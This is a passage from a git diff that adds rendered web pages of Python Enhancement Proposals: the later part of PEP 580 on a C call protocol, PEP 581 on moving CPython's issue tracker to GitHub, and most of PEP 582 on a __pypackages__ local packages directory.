  • +
+

One exception is CCALL_DEFARG | CCALL_NOARGS: +the unused argument is dropped, so the signature becomes

+
    +
  • CCALL_DEFARG | CCALL_NOARGS: +cc_func(const PyCCallDef *def, PyObject *self)
  • +
+

NOTE: unlike the existing METH_... flags, +the CCALL_... constants do not necessarily represent single bits. +So checking if (cc_flags & CCALL_VARARGS) is not a valid way +for checking the signature. +There are also no guarantees of binary compatibility for these flags +between Python versions. +This allows the implementation to choose the most efficient +numerical values of the flags. +In the reference implementation, +the legal values for cc_flags & CCALL_SIGNATURE form exactly the interval [0, …, 11]. +This means that the compiler can easily +optimize a switch statement for those cases using a computed goto.

+
+

Checking __objclass__

+

If the CCALL_OBJCLASS flag is set and if cr_self is NULL +(this is the case for unbound methods of extension types), +then a type check is done: +the function must be called with at least one positional argument +and the first (typically called self) must be an instance of +cc_parent (which must be a class). +If not, a TypeError is raised.

+
+
+

Self slicing

+

If cr_self is not NULL or if the flag CCALL_SELFARG +is not set in cc_flags, then the argument passed as self +is simply cr_self.

+

If cr_self is NULL and the flag CCALL_SELFARG is set, +then the first positional argument is removed from +args and instead passed as self argument to the C function. +Effectively, the first positional argument is treated as __self__. +If there are no positional arguments, TypeError is raised.

+

This process is called “self slicing” and a function is said to have self +slicing if cr_self is NULL and CCALL_SELFARG is set.

+

Note that a CCALL_NOARGS function with self slicing effectively has +one argument, namely self. +Analogously, a CCALL_O function with self slicing has two arguments.

+
+
+

Descriptor behavior

+

Classes supporting the C call protocol +must implement the descriptor protocol in a specific way.

+

This is required for an efficient implementation of bound methods: +if other code can make assumptions on what __get__ does, +it enables optimizations which would not be possible otherwise. +In particular, we want to allow sharing +the PyCCallDef structure between bound and unbound methods. +We also need a correct implementation of _PyObject_GetMethod +which is used by the LOAD_METHOD/CALL_METHOD optimization.

+

First of all, if func supports the C call protocol, +then func.__set__ and func.__delete__ must not be implemented.

+

Second, func.__get__ must behave as follows:

+
    +
  • If cr_self is not NULL, then __get__ must be a no-op +in the sense that func.__get__(obj, cls)(*args, **kwds) +behaves exactly the same as func(*args, **kwds). +It is also allowed for __get__ to be not implemented at all.
  • +
  • If cr_self is NULL, then func.__get__(obj, cls)(*args, **kwds) +(with obj not None) +must be equivalent to func(obj, *args, **kwds). +In particular, __get__ must be implemented in this case. +This is unrelated to self slicing: obj may be passed +as self argument to the C function or it may be the first positional argument.
  • +
  • If cr_self is NULL, then func.__get__(None, cls)(*args, **kwds) +must be equivalent to func(*args, **kwds).
  • +
+

There are no restrictions on the object func.__get__(obj, cls). +The latter is not required to implement the C call protocol for example. +We only specify what func.__get__(obj, cls).__call__ does.

+

For classes that do not care about __self__ and __get__ at all, +the easiest solution is to assign cr_self = Py_None +(or any other non-NULL value).

+
+
+

The __name__ attribute

+

The C call protocol requires that the function has a __name__ +attribute which is of type str (not a subclass).

+

Furthermore, the object returned by __name__ must be stored somewhere; +it cannot be a temporary object. +This is required because PyEval_GetFuncName +uses a borrowed reference to the __name__ attribute +(see also [2]).

+
+
+

Generic API functions

+

This section lists the new public API functions or macros +dealing with the C call protocol.

+
    +
  • int PyCCall_Check(PyObject *op): +return true if op implements the C call protocol.
  • +
+

All the functions and macros below +apply to any instance supporting the C call protocol. +In other words, PyCCall_Check(func) must be true.

+
    +
  • PyObject *PyCCall_Call(PyObject *func, PyObject *args, PyObject *kwds): +call func with positional arguments args +and keyword arguments kwds (kwds may be NULL). +This function is meant to be put in the tp_call slot.
  • +
  • PyObject *PyCCall_FastCall(PyObject *func, PyObject *const *args, Py_ssize_t nargs, PyObject *kwds): +call func with nargs positional arguments given by args[0], …, args[nargs-1]. +The parameter kwds can be NULL (no keyword arguments), +a dict with name:value items or a tuple with keyword names. +In the latter case, the keyword values are stored in the args +array, starting at args[nargs].
  • +
+

Macros to access the PyCCallRoot and PyCCallDef structures:

+
    +
  • const PyCCallRoot *PyCCall_CCALLROOT(PyObject *func): +pointer to the PyCCallRoot structure inside func.
  • +
  • const PyCCallDef *PyCCall_CCALLDEF(PyObject *func): +shorthand for PyCCall_CCALLROOT(func)->cr_ccall.
  • +
  • uint32_t PyCCall_FLAGS(PyObject *func): +shorthand for PyCCall_CCALLROOT(func)->cr_ccall->cc_flags.
  • +
  • PyObject *PyCCall_SELF(PyOject *func): +shorthand for PyCCall_CCALLROOT(func)->cr_self.
  • +
+

Generic getters, meant to be put into the tp_getset array:

+
    +
  • PyObject *PyCCall_GenericGetParent(PyObject *func, void *closure): +return cc_parent. +Raise AttributeError if cc_parent is NULL.
  • +
  • PyObject *PyCCall_GenericGetQualname(PyObject *func, void *closure): +return a string suitable for using as __qualname__. +This uses the __qualname__ of cc_parent if possible. +It also uses the __name__ attribute.
  • +
+
+
+

Profiling

+

The profiling events +c_call, c_return and c_exception are only generated +when calling actual instances of builtin_function_or_method or method_descriptor. +This is done for simplicity and also for backwards compatibility +(such that the profile function does not receive objects that it does not recognize). +In a future PEP, we may extend C-level profiling to arbitrary classes +implementing the C call protocol.

+
+
+
+

Changes to built-in functions and methods

+

The reference implementation of this PEP changes +the existing classes builtin_function_or_method and method_descriptor +to use the C call protocol. +In fact, those two classes are almost merged: +the implementation becomes very similar, but they remain separate classes +(mostly for backwards compatibility). +The PyCCallDef structure is simply stored +as part of the object structure. +Both classes use PyCFunctionObject as object structure. +This is the new layout for both classes:

+
typedef struct {
+    PyObject_HEAD
+    PyCCallDef  *m_ccall;
+    PyObject    *m_self;         /* Passed as 'self' arg to the C function */
+    PyCCallDef   _ccalldef;      /* Storage for m_ccall */
+    PyObject    *m_name;         /* __name__; str object (not NULL) */
+    PyObject    *m_module;       /* __module__; can be anything */
+    const char  *m_doc;          /* __text_signature__ and __doc__ */
+    PyObject    *m_weakreflist;  /* List of weak references */
+} PyCFunctionObject;
+
+
+

For functions of a module and for unbound methods of extension types, +m_ccall points to the _ccalldef field. +For bound methods, m_ccall points to the PyCCallDef +of the unbound method.

+

NOTE: the new layout of method_descriptor changes it +such that it no longer starts with PyDescr_COMMON. +This is purely an implementation detail and it should cause few (if any) +compatibility problems.

+
+

C API functions

+

The following function is added (also to the stable ABI):

+
    +
  • PyObject * PyCFunction_ClsNew(PyTypeObject *cls, PyMethodDef *ml, PyObject *self, PyObject *module, PyObject *parent): +create a new object with object structure PyCFunctionObject and class cls. +The entries of the PyMethodDef structure are used to construct +the new object, but the pointer to the PyMethodDef structure +is not stored. +The flags for the C call protocol are automatically determined in terms +of ml->ml_flags, self and parent.
  • +
+

The existing functions PyCFunction_New, PyCFunction_NewEx and +PyDescr_NewMethod are implemented in terms of PyCFunction_ClsNew.

+

The undocumented functions PyCFunction_GetFlags +and PyCFunction_GET_FLAGS are deprecated. +They are still artificially supported by storing the original METH_... +flags in a bitfield inside cc_flags. +Despite the fact that PyCFunction_GetFlags is technically +part of the stable ABI, +it is highly unlikely to be used that way: +first of all, it is not even documented. +Second, the flag METH_FASTCALL +is not part of the stable ABI but it is very common +(because of Argument Clinic). +So, if one cannot support METH_FASTCALL, +it is hard to imagine a use case for PyCFunction_GetFlags. +The fact that PyCFunction_GET_FLAGS and PyCFunction_GetFlags +are not used at all by CPython outside of Objects/call.c +further shows that these functions are not particularly useful.

+
+
+
+

Inheritance

+

Extension types inherit the type flag Py_TPFLAGS_HAVE_CCALL +and the value tp_ccalloffset from the base class, +provided that they implement tp_call and tp_descr_get +the same way as the base class. +Heap types never inherit the C call protocol because +that would not be safe (heap types can be changed dynamically).

+
+
+

Performance

+

This PEP should not impact the performance of existing code +(in the positive or negative sense). +It is meant to allow efficient new code to be written, +not to make existing code faster.

+

Here are a few pointers to the python-dev mailing list where +performance improvements are discussed:

+ +
+
+

Stable ABI

+

The function PyCFunction_ClsNew is added to the stable ABI.

+

None of the functions, structures or constants dealing with the C call protocol +are added to the stable ABI.

+

There are two reasons for this: +first of all, the most useful feature of the C call protocol is probably the +METH_FASTCALL calling convention. +Given that this is not even part of the public API (see also PEP 579, issue 6), +it would be strange to add anything else from the C call protocol +to the stable ABI.

+

Second, we want the C call protocol to be extensible in the future. +By not adding anything to the stable ABI, +we are free to do that without restrictions.

+
+
+

Backwards compatibility

+

There is no difference at all for the Python interface, +nor for the documented C API +(in the sense that all functions remain supported with the same functionality).

+

The only potential breakage is with C code +which accesses the internals of PyCFunctionObject and PyMethodDescrObject. +We expect very few problems because of this.

+
+
+

Rationale

+
+

Why is this better than PEP 575?

+

One of the major complaints of PEP 575 was that is was coupling +functionality (the calling and introspection protocol) +with the class hierarchy: +a class could only benefit from the new features +if it was a subclass of base_function. +It may be difficult for existing classes to do that +because they may have other constraints on the layout of the C object structure, +coming from an existing base class or implementation details. +For example, functools.lru_cache cannot implement PEP 575 as-is.

+

It also complicated the implementation precisely because changes +were needed both in the implementation details and in the class hierarchy.

+

The current PEP does not have these problems.

+
+
+

Why store the function pointer in the instance?

+

The actual information needed for calling an object +is stored in the instance (in the PyCCallDef structure) +instead of the class. +This is different from the tp_call slot or earlier attempts +at implementing a tp_fastcall slot [1].

+

The main use case is built-in functions and methods. +For those, the C function to be called does depend on the instance.

+

Note that the current protocol makes it easy to support the case +where the same C function is called for all instances: +just use a single static PyCCallDef structure for every instance.

+
+
+

Why CCALL_OBJCLASS?

+

The flag CCALL_OBJCLASS is meant to support various cases +where the class of a self argument must be checked, such as:

+
>>> list.append({}, None)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: append() requires a 'list' object but received a 'dict'
+
+>>> list.__len__({})
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: descriptor '__len__' requires a 'list' object but received a 'dict'
+
+>>> float.__dict__["fromhex"](list, "0xff")
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: descriptor 'fromhex' for type 'float' doesn't apply to type 'list'
+
+
+

In the reference implementation, only the first of these uses the new code. +The other examples show that these kind of checks appear +in multiple places, so it makes sense to add generic support for them.

+
+
+

Why CCALL_SELFARG?

+

The flag CCALL_SELFARG and the concept of self slicing +are needed to support methods: +the C function should not care +whether it is called as unbound method or as bound method. +In both cases, there should be a self argument +and this is simply the first positional argument of an unbound method call.

+

For example, list.append is a METH_O method. +Both the calls list.append([], 42) and [].append(42) should +translate to the C call list_append([], 42).

+

Thanks to the proposed C call protocol, we can support this in such a way +that both the unbound and the bound method share a PyCCallDef +structure (with the CCALL_SELFARG flag set).

+

So, CCALL_SELFARG has two advantages: +there is no extra layer of indirection for calling methods +and constructing bound methods does not require setting up a PyCCallDef structure.

+

Another minor advantage is that we could +make the error messages for a wrong call signature +more uniform between Python methods and built-in methods. +In the following example, Python is undecided whether +a method takes 1 or 2 arguments:

+
>>> class List(list):
+...     def myappend(self, item):
+...         self.append(item)
+>>> List().myappend(1, 2)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: myappend() takes 2 positional arguments but 3 were given
+>>> List().append(1, 2)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: append() takes exactly one argument (2 given)
+
+
+

It is currently impossible for PyCFunction_Call +to know the actual number of user-visible arguments +since it cannot distinguish at runtime between +a function (without self argument) and a bound method (with self argument). +The CCALL_SELFARG flag makes this difference explicit.

+
+
+

Why CCALL_DEFARG?

+

The flag CCALL_DEFARG gives the callee access to the PyCCallDef *. +There are various use cases for this:

+
    +
  1. The callee can use the cc_parent field, which is useful for PEP 573.
  2. +
  3. Applications are free to extend the PyCCallDef structure with user-defined +fields, which can then be accessed analogously.
  4. +
  5. In the case where the PyCCallDef structure +is part of the object structure +(this is true for example for PyCFunctionObject), +an appropriate offset can be subtracted from the PyCCallDef pointer +to get a pointer to the callable object defining that PyCCallDef.
  6. +
+

An earlier version of this PEP defined a flag CCALL_FUNCARG +instead of CCALL_DEFARG which would pass the callable object +to the callee. +This had similar use cases, but there was some ambiguity for +bound methods: should the “callable object” be the bound method +object or the original function wrapped by the method? +By passing the PyCCallDef * instead, this ambiguity is gone +since the bound method uses the PyCCallDef * from the wrapped function.

+
+
+

Replacing tp_print

+

We repurpose tp_print as tp_ccalloffset because this makes +it easier for external projects to backport the C call protocol +to earlier Python versions. +In particular, the Cython project has shown interest in doing that +(see https://mail.python.org/pipermail/python-dev/2018-June/153927.html).

+
+
+
+

Alternative suggestions

+

PEP 576 is an alternative approach to solving the same problem as this PEP. +See https://mail.python.org/pipermail/python-dev/2018-July/154238.html +for comments on the difference between PEP 576 and PEP 580.

+
+
+

Discussion

+

Links to threads on the python-dev mailing list +where this PEP has been discussed:

+ +
+
+

Reference implementation

+

The reference implementation can be found at +https://github.com/jdemeyer/cpython/tree/pep580

+

For an example of using the C call protocol, +the following branch implements functools.lru_cache using PEP 580: +https://github.com/jdemeyer/cpython/tree/lru580

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0580.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0581/index.html b/pep-0581/index.html new file mode 100644 index 00000000000..af0a5a89c73 --- /dev/null +++ b/pep-0581/index.html @@ -0,0 +1,413 @@ + + + + + + + + PEP 581 – Using GitHub Issues for CPython | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 581 – Using GitHub Issues for CPython

+
+
Author:
+
Mariatta <mariatta at python.org>
+
BDFL-Delegate:
+
Barry Warsaw <barry at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Process
+
Created:
+
20-Jun-2018
+
Post-History:
+
07-Mar-2019
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP outlines the rationale for migration from Python’s issue +tracker on Roundup to GitHub issues. See PEP 588 for the detailed +migration plan.

+
+
+

Rationale

+

CPython’s development moved to GitHub in February 2017. All other +projects within the PSF’s organization are hosted on GitHub and are +using GitHub issues. CPython is still using Roundup as the issue +tracker on bugs.python.org (bpo) [1].

+
+

Why GitHub?

+

GitHub has a lot of nice features, readily available out of the box. Some of +these aren’t readily available on Roundup / bpo.

+
    +
  • APIs that can be used to build integrations and automations. There are various +existing integrations and applications available from GitHub Marketplace to +help with the workflow. New applications are easily installed and enabled. +In addition, we’ve had great success with building our own GitHub bots, like +miss-islington [2], bedevere [3], and the-knights-who-say-ni [4].
  • +
  • Ability to embed/drag and drop screenshots and debug log files into GitHub +pull requests and issues.
  • +
  • Administrators and core developers can edit issues, comments, and pull requests.
  • +
  • Ability to reply to issue and pull request conversations via email.
  • +
  • Support for two factor authentication.
  • +
  • Support for markdown and emoji.
  • +
  • Preview tab, showing how a comment will be rendered, prior to +actually posting.
  • +
  • Support for voting via reactions.
  • +
  • Support for permalinks [5], allowing easy quoting and copying & pasting of +source code. It is possible to automatically embed code snippet on GitHub +by pasting a permalink.
  • +
  • Core developers, volunteers, and the PSF don’t have to maintain the +issue infrastructure/site, giving us more time and resources to focus on the +development of Python.
  • +
  • Ability to automatically close issues when a PR has been merged [6].
      +
    • Note that this feature exists in bpo too.
    • +
    +
  • +
  • Lower barrier to contribution. With more than 28 million users, an open +source contributor is more likely to already have an account and be familiar +with GitHub’s interface, making it easier to start contributing.
  • +
  • Email notifications containing metadata [7], integrated with Gmail, allowing +systematic filtering of emails. While Roundup emails contain some metadata, +they’re not as extensive.
  • +
  • Additional privacy, such as offering the user a choice to hide an +email address, while still allowing communication with the user +through @-mentions.
  • +
+
+
+

Issues with Roundup / bpo

+
    +
  • Less than five people maintain bpo. Some of them are core developers.
  • +
  • The upstream Roundup code is in Mercurial. Without any CI available, +it puts heavy burden on the few existing maintainers in terms of +reviewing, testing, and applying patches. While there is an unofficial mirror +of Roundup on GitHub [8], Mercurial patches are still the main way to contribute +to it.

    There is an open discussion about moving the source code of bpo to +GitHub [9]. If the source code of bpo does move to GitHub, it will +become difficult to update patches from upstream. But as long as it +is in Mercurial, it is difficult to maintain and onboard new +contributors.

    +
  • +
  • In its current state, the project is not equipped to accept lots of +contributions from people who aren’t already familiar with the code +base.
  • +
  • The user interface needs an update and redesign. It will require UX/UI research +to keep it up to date with current web standards, including accessibility.
  • +
  • Users email addresses were exposed.
      +
    • Note: Exposing email address to registered and logged in users was a decision +taken when bpo instance was setup. This behavior has been recently modified +after PEP 581’s acceptance.
    • +
    +
  • +
  • REST API is not currently available in bpo. There was an open issue in Roundup +for adding REST API [10]. At the time PEP 581 was proposed, the ticket received +no activity since 2016. REST API has been integrated in Roundup in February 2019, +however it is not yet integrated to bpo.
  • +
  • It sends a number of unnecessary emails and notifications. An example is the nosy email, +where email notifications are sent whenever someone adds themselves as “nosy”. +An issue has been filed in upstream Roundup about this since 2012 with +little traction [11]. While it can be configured, the request to configure it +was not addressed/ignored.
  • +
  • Creating an account has been a hassle. There have been reports of people +having trouble creating accounts or logging in. Some examples of open tickets: +“Commas in username causes error in nosy list” [12], “An error has occurred ..” [13], +“It is not sending me the confirmation email …” [14].
  • +
+
+
+
+

Why not GitLab?

+

Had we migrated to GitLab instead of GitHub in 2017, this PEP would have been +titled “Using GitLab Issues for CPython”.

+
+
+

Why not another issue tracker?

+

Using another issue tracker will require yet another learning curve, for having +to learn and get used to a different interface. We’ll also need to learn and +figure out how to build the integrations with GitHub.

+

By using GitHub issues, where the CPython source code is currently +hosted and where pull requests are taking place, we’ll be providing +consistent experience to contributors and maintainers, while not +having to jump from one interface to another.

+
+
+

Why not focus on improving Roundup / bpo?

+

GitHub has many features we like that are already available. We still need to +build out additional integrations and update our bots, but this is something +we already know how to do.

+

In order to really improve Roundup / bpo, it needs to first migrate to GitHub +and add CI and bots. As I understand it, there is hesitation because upstream +Roundup is still in Mercurial. Someone more familiar with Roundup / bpo needs +to champion this effort. (I’m not volunteering, I’m sorry).

+

I believe the effort of creating and maintaining GitHub integrations and bots +is much less than the effort needed to get Roundup up to speed and then to +continue maintaining it.

+
+
+

Downsides of GitHub

+

GitHub is not the perfect issue tracker. Several issues we need to be aware of:

+
    +
  • Fear of uncertainty and vendor lock in. GitHub is proprietary and there is +risk of vendor lock-in. However, this is an existing problem since CPython’s +codebase is already on GitHub. This is also not a unique problem to CPython. +As a precautionary step, CPython’s repository on GitHub has +been backed up on daily basis since June 2018. [15]
  • +
  • Bots maintenance costs money, and also takes up volunteer time. We would +be shifting maintenance burden from Roundup to the bots. At the very least, +so far we’ve been able to address any bugs/issues related to the bots/GitHub +APIs rather quickly, in a matter of days, instead of months or years. GitHub +APIs are extensive, and used not only by CPython’s bots but also by the wider +Python community. It makes GitHub APIs more approachable compared to +the maintenance of Roundup/bpo.
  • +
  • Using GitHub could possibly increase the triaging effort. This was first raised +as a Zulip topic [16], and also brought up during Core Python sprint in +September 2018 [17]. A few solutions have been proposed and considered, such as +creating a special triage team [18]. After PEP 581’s acceptance, GitHub released a +new triaging role, currently in beta. The PSF has been in touch with GitHub +to have this enabled for Python organization. This is pending GitHub’s review [19].
  • +
  • Using GitHub could make it easier for people to post disruptive or spammy comments. +It is true that there has been incidents where core developers have to moderate +and lock disruptive discussions on GitHub. Thankfully, GitHub interface makes +it easy for core developers to moderate discussions. In addition, incidents +can be escalated to GitHub.
  • +
  • Manually editing issue templates can be cumbersome and error-prone. However, +for most people, creating issues on GitHub will be a much better experience +than creating issue on bpo. The numerous fields and textbox to choose from +can be confusing and intimidating to a newcomer, and it is not possible +to “edit” a message. On GitHub, issue creator can preview their submission, +and edit their mistake after posting.
  • +
  • bpo uses a number of fields to specify several metadata, and these might not +be easily transferable to GitHub. The intended way to handle custom metadata +on GitHub is by using labels. The details of which labels to create will be +further discussed in PEP 588.
  • +
+
+
+

Further questions and discussions

+

You can post questions on Discourse under the +Core-Workflow category.

+
+
+

Acknowledgements

+

Thanks to Guido van Rossum, Brett Cannon, and Alyssa Coghlan, who were consulted +in the early stage and research of this PEP. Their feedback, concerns, input, +and ideas have been valuable.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0581.rst

+

Last modified: 2024-06-02 04:57:49 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0582/index.html b/pep-0582/index.html new file mode 100644 index 00000000000..350ae9a53bf --- /dev/null +++ b/pep-0582/index.html @@ -0,0 +1,445 @@ + + + + + + + + PEP 582 – Python local packages directory | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 582 – Python local packages directory

+
+
Author:
+
Kushal Das <mail at kushaldas.in>, Steve Dower <steve.dower at python.org>, +Donald Stufft <donald at stufft.io>, Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
16-May-2018
+
Python-Version:
+
3.12
+
Post-History:
+
01-Mar-2019
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes extending the existing mechanism for setting up sys.path +to include a new __pypackages__ directory, in addition to the existing +locations. The new directory will be added at the start of sys.path, after +the current working directory and just before the system site-packages, to give +packages installed there priority over other locations.

+

This is similar to the existing mechanism of adding the current directory (or +the directory the script is located in), but by using a subdirectory, +additional libraries are kept separate from the user’s work.

+
+
+

Motivation

+

New Python programmers can benefit from being taught the value of isolating an +individual project’s dependencies from their system environment. However, the +existing mechanism for doing this, virtual environments, is known to be complex +and error-prone for beginners to understand. Explaining virtual environments is +often a distraction when trying to get a group of beginners set up - differences +in platform and shell environments require individual assistance, and the need +for activation in every new shell session makes it easy for students to make +mistakes when coming back to work after a break. This proposal offers a lightweight +solution that gives isolation without the user needing to understand more +advanced concepts.

+

Furthermore, standalone Python applications usually need 3rd party libraries to +function. Typically, they are either designed to be run from a virtual environment, +where the dependencies are installed into the environment alongside the application, +or they bundle their dependencies in a subdirectory, and modify sys.path at +application startup. Virtual environments, while a common and effective solution +(used, for example, by the pipx tool), are somewhat awkward to set up and manage, +and are not relocatable. On the other hand, manual manipulation of sys.path is +boilerplate that developers need to get right, and (being a runtime behaviour) +it is not understood by tools like linters and type checkers. The __pypackages__ +proposal formalises the idea of a “bundled dependencies” location, avoiding the +boilerplate and providing a standard location that development tools can be taught +to recognise.

+

It should be noted that in general, Python libraries cannot be simply copied +between machines, platforms, or even necessarily between Python versions. This +proposal does nothing to change that fact, and while it is tempting to assume +that bundling a script and its __pypackages__ is a mechanism for +distributing applications, this is explicitly not a goal of this proposal. +Developers remain responsible for the portability of their code.

+
+
+

Rationale

+

While sys.path can be manipulated at runtime, the default value is important, as +it establishes a common baseline that users and tools can agree on. The current default +does not include a location that could be viewed as “private to the current project”, +and yet that is a useful concept.

+

This is similar to the npm node_modules directory, which is popular in the +Javascript community, and something that developers familiar with that +ecosystem often ask for from Python.

+
+
+

Specification

+

This PEP proposes to add a new step in the process of calculating sys.path at +startup.

+

When the interactive interpreter starts, if a __pypackages__ directory is +found in the current working directory, then it will be included in +sys.path after the entry for current working directory and just before the +system site-packages.

+

When the interpreter runs a script, Python will try to find __pypackages__ +in the same directory as the script. If found (along with the current Python +version directory inside), then it will be used, otherwise Python will behave +as it does currently.

+

The behaviour should work exactly the same as the way the existing mechanism +for adding the current working directory or script directory to sys.path +works. For example, __pypackages__ will be ignored if the -P option or +the PYTHONSAFEPATH environment variable is set.

+

In order to be recognised, the __pypackages__ directory must be laid out +according to a new localpackages scheme in the sysconfig module. +Specifically, both of the purelib and platlib directories must be +present, using the following code to determine the locations of those +directories:

+
scheme = "localpackages"
+purelib = sysconfig.get_path("purelib", scheme, vars={"base": "__pypackages__", "platbase": "__pypackages__"})
+platlib = sysconfig.get_path("platlib", scheme, vars={"base": "__pypackages__", "platbase": "__pypackages__"})
+
+
+

These two locations will be added to sys.path, other directories or +files in the __pypackages__ directory will be silently ignored. The +paths will be based on Python versions.

+
+

Note

+

There is a possible option of having a separate new API, it is documented at issue #3013.

+
+
+

Example

+

The following shows an example project directory structure, and different ways +the Python executable and any script will behave. The example is for Unix-like +systems - on Windows the subdirectories will be different.

+
foo
+    __pypackages__
+        lib
+            python3.10
+                       site-packages
+                                     bottle
+    myscript.py
+
+/> python foo/myscript.py
+sys.path[0] == 'foo'
+sys.path[1] == 'foo/__pypackages__/lib/python3.10/site-packages/'
+
+
+cd foo
+
+foo> /usr/bin/ansible
+    #! /usr/bin/env python3
+foo> python /usr/bin/ansible
+
+foo> python myscript.py
+
+foo> python
+sys.path[0] == '.'
+sys.path[1] == './__pypackages__/lib/python3.10/site-packages'
+
+foo> python -m bottle
+
+
+

We have a project directory called foo and it has a __pypackages__ +inside of it. We have bottle installed in that +__pypackages__/lib/python3.10/site-packages/, and have a myscript.py +file inside of the project directory. We have used whatever tool we generally +use to install bottle in that location.

+

For invoking a script, Python will try to find a __pypackages__ inside of +the directory that the script resides [1], /usr/bin. The same will happen +in case of the last example, where we are executing /usr/bin/ansible from +inside of the foo directory. In both cases, it will not use the +__pypackages__ in the current working directory.

+

Similarly, if we invoke myscript.py from the first example, it will use the +__pypackages__ directory that was in the foo directory.

+

If we go inside of the foo directory and start the Python executable (the +interpreter), it will find the __pypackages__ directory inside of the +current working directory and use it in the sys.path. The same happens if we +try to use the -m and use a module. In our example, bottle module will +be found inside of the __pypackages__ directory.

+

The above two examples are only cases where __pypackages__ from current +working directory is used.

+

In another example scenario, a trainer of a Python class can say “Today we are +going to learn how to use Twisted! To start, please checkout our example +project, go to that directory, and then run a given command to install Twisted.”

+

That will install Twisted into a directory separate from python3. There’s no +need to discuss virtual environments, global versus user installs, etc. as the +install will be local by default. The trainer can then just keep telling them to +use python3 without any activation step, etc.

+ +
+
+
+

Relationship to virtual environments

+

At its heart, this proposal is simply to modify the calculation of the default +value of sys.path, and does not relate at all to the virtual environment +mechanism. However, __pypackages__ can be viewed as providing an isolation +capability, and in that sense, it “competes” with virtual environments.

+

However, there are significant differences:

+
+
    +
  • Virtual environments are isolated from the system environment, whereas +__pypackages__ simply adds to the system environment.
  • +
  • Virtual environments include a full “installation scheme”, with directories +for binaries, C header files, etc., whereas __pypackages__ is solely +for Python library code.
  • +
  • Virtual environments work most smoothly when “activated”. This proposal +needs no activation.
  • +
+
+

This proposal should be seen as independent of virtual environments, not competing +with them. At best, some use cases currently only served by virtual environments +can also be served (possibly better) by __pypackages__.

+

It should be noted that libraries installed in __pypackages__ will be visible +in a virtual environment. This arguably breaks the isolation of virtual environments, +but it is no different in principle to the presence of the current directory on +sys.path (or mechanisms like the PYTHONPATH environment variable). The only +difference is in degree, as the expectation is that people will more commonly install +packages in __pypackages__. The alternative would be to explicitly detect virtual +environments and disable __pypackages__ in that case - however that would break +scripts with bundled dependencies. The PEP authors believe that developers using +virtual environments should be experienced enough to understand the issue and +anticipate and avoid any problems.

+
+
+

Security Considerations

+

In theory, it is possible to add a library to the __pypackages__ directory +that overrides a stdlib module or an installed 3rd party library. For the +__pypackages__ associated with a script, this is assumed not to be a +significant issue, as it is unlikely that anyone would be able to write to +__pypackages__ unless they also had the ability to write to the script itself.

+

For a __pypackages__ directory in the current working directory, the +interactive interpreter could be affected. However, this is not significantly +different than the existing issue of someone having a math.py module in their +current directory, and while (just like that case) it can cause user confusion, +it does not introduce any new security implications.

+

When running a script, any __pypackages__ directory in the current working +directory is ignored. This is the same approach Python uses for adding the +current working directory to sys.path and ensures that it is not possible +to change the behaviour of a script by modifying files in the current +directory.

+

Also, a __pypackages__ directory is only recognised in the current (or +script) directory. The interpreter will not scan for __pypackages__ in +parent directories. Doing so would open up the risk of security issues if +directory permissions on parents differ. In particular, scripts in the bin +directory or __pypackages__ (the scripts location in sysconfig +terms) have no special access to the libraries installed in __pypackages__. +Putting executable scripts in a bin directory is not supported by this +proposal.

+
+
+

How to Teach This

+

The original motivation for this proposal was to make it easier to teach Python +to beginners. To that end, it needs to be easy to explain, and simple to use.

+

At the most basic level, this is similar to the existing mechanism where the +script directory is added to sys.path and can be taught in a similar manner. +However, for its intended use of “lightweight isolation”, it would likely be taught +in terms of “things you put in a __pypackages__ directory are private to your +script”. The experience of the PEP authors suggests that this would be significantly +easier to teach than the current alternative of introducing virtual environments.

+
+
+

Impact on Tools

+

As the intended use of the feature is to install 3rd party libraries in the new +directory, it is important that tools, particularly installers, understand how to +manage __pypackages__.

+

It is hoped that tools will introduce a dedicated “pypackages” installation +mode that is guaranteed to match the expected layout in all cases. However, +the question of how best to support the __pypackages__ layout is ultimately +left to individual tool maintainers to consider and decide on.

+

Tools that locate packages without actually running Python code (IDEs, linters, +type checkers, etc.) would need updating to recognise __pypackages__. In the +absence of such updates, the __pypackages__ directory would work similarly +to directories currently added to sys.path at runtime (i.e., the tool would +probably ignore it).

+
+
+

Backwards Compatibility

+

The directory name __pypackages__ was chosen because it is unlikely to be in +common use. It is true that users who have chosen to use that name for their own +purposes will be impacted, but at the time this PEP was written, this was viewed +as a relatively low risk.

+

Unfortunately, in the time this PEP has been under discussion, a number of tools +have chosen to implement variations on what is being proposed here, which are not +all compatible with the final form of the PEP. As a result, the risk of clashes is +now higher than originally anticipated.

+

It would be possible to mitigate this by choosing a different name, hopefully as +uncommon as __pypackages__ originally was. But realistically, any compatibility +issues can be viewed as simply the consequences of people trying to implement +draft proposals, without making the effort to track changes in the proposal. As such, +it seems reasonable to retain the __pypackages__ name, and put the burden of +addressing the compatibility issue on the tools that implemented the draft version.

+
+

Impact on other Python implementations

+

Other Python implementations will need to replicate the new behavior of the +interpreter bootstrap, including locating the __pypackages__ directory and +adding it the sys.path just before site packages, if it is present. This is +no different to any other Python change.

